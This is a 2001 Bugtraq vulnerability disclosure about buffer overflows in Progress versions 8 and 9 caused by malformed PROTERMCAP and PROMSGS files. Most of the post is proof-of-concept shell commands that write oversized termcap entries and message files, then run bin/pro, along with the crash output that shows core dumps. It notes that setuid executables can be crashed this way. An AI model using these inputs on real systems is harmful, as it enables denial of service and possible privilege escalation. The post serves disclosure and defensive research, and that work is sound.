[22810] in bugtraq
Progress TERM (protermcap) overflows and PROMSGS overflows
daemon@ATHENA.MIT.EDU (KF)
Tue Oct 9 00:51:18 2001
Message-ID: <3BC20943.5A31653E@snosoft.com>
Date: Mon, 08 Oct 2001 16:14:59 -0400
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
To: bugtraq@security-focus.com
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
A malformed termcaps and promsgs can overwrite memory on progress
versions 8 and 9 These are two seperate issues but the below examples
show they can be used simultaneously in some cases. These have been
patched to my knowledge however I do not know the patch numbers. Put a
few thousand chars on each line you should be able to crash it most of
the suid executables and plenty of others. Please note these
issues are not related to the other 2 posts released this week. They
were filed
with progress under different issue tickets and were addressed in fixes
seperately.
mal termcap entry:
v7kf|version 7 key functions:\
:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....
[root@linux dlc]# echo "v7kf|version 7 key functions:\\" > term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# export PROTERMCAP=./term
There are a few ways to set this off... you can make use of a bug in the
PROMSGS
here is the standard promsgs error for a bad term.
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
Unable to use your terminal. Check your PROTERMCAP file. (443)
** Could not find terminal type xterm in file ./term. (146)
[root@linux dlc]# perl -e 'print "A" x 9000' > /tmp/promsgs
[root@linux dlc]# export PROMSGS=/tmp/promsgs
[root@linux dlc]# bin/pro
@@@@@@ @@@@@@ @@@@@@@ @@@@@ @@@@@@ @@@@@@@ @@@@@
@@@@@
@ @ @ @ @ @ @ @ @ @ @ @ @
@ @
@ @ @ @ @ @ @ @ @ @ @ @
@@@@@@ @@@@@@ @ @ @ @@@@ @@@@@@ @@@@@ @@@@@
@@@@@
@ @ @ @ @ @ @ @ @ @ @
@
@ @ @ @ @ @ @ @ @ @ @ @ @
@
@ @ @ @@@@@@@ @@@@@ @ @ @@@@@@@ @@@@@ @@@@@
Progress Software Corporation
14 Oak Park
Bedford, Massachusetts 01730
781-280-4000
PROGRESS is a registered trademark of Progress Software
Corporation
Copyright 1984-2001
by Progress Software Corporation
All Rights Reserved
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
Error formatting messaage 96. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
rrno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
errno=0 reading promsgs file, it may have been deleted.
Error formatting messaage 146. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 443
Error formatting messaage 49. Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 439
Quit (core dumped)
Heres the normal error when the termcap is wrong.
Unable to use your terminal. Check your PROTERMCAP file. (443)
** The protermcap file must contain :ce. (117)
** The protermcap file must contain :cl. (117)
** The protermcap file must contain :cm. (117)
Now for an example using just the termcap without tampering with
PROMSGS...
[root@linux dlc]# echo :ce=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :cl=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :cm=`perl -e 'print "A" x 3000'` >> term
[root@linux dlc]# echo :ce=`perl -e 'print "A" x 9000'` >> term
[root@linux dlc]# export TERM=v7kf
[root@linux dlc]# bin/pro
@@@@@@ @@@@@@ @@@@@@@ @@@@@ @@@@@@ @@@@@@@ @@@@@
@@@@@
@ @ @ @ @ @ @ @ @ @ @ @ @
@ @
@ @ @ @ @ @ @ @ @ @ @ @
@@@@@@ @@@@@@ @ @ @ @@@@ @@@@@@ @@@@@ @@@@@
@@@@@
@ @ @ @ @ @ @ @ @ @ @
@
@ @ @ @ @ @ @ @ @ @ @ @ @
@
@ @ @ @@@@@@@ @@@@@ @ @ @@@@@@@ @@@@@ @@@@@
Progress Software Corporation
14 Oak Park
Bedford, Massachusetts 01730
781-280-4000
PROGRESS is a registered trademark of Progress Software
Corporation
Copyright 1984-2001
by Progress Software Corporation
All Rights Reserved
PROGRESS Version 9.1C as of Thu Jun 7 10:03:59 EDT 2001
SYSTEM ERROR: strent request for more than 32K. (893)
Quit (core dumped)
It is also possible to crash suids using only the PROMSGS... I have a
patched version at the moment so I can not demonstrate.
-KF
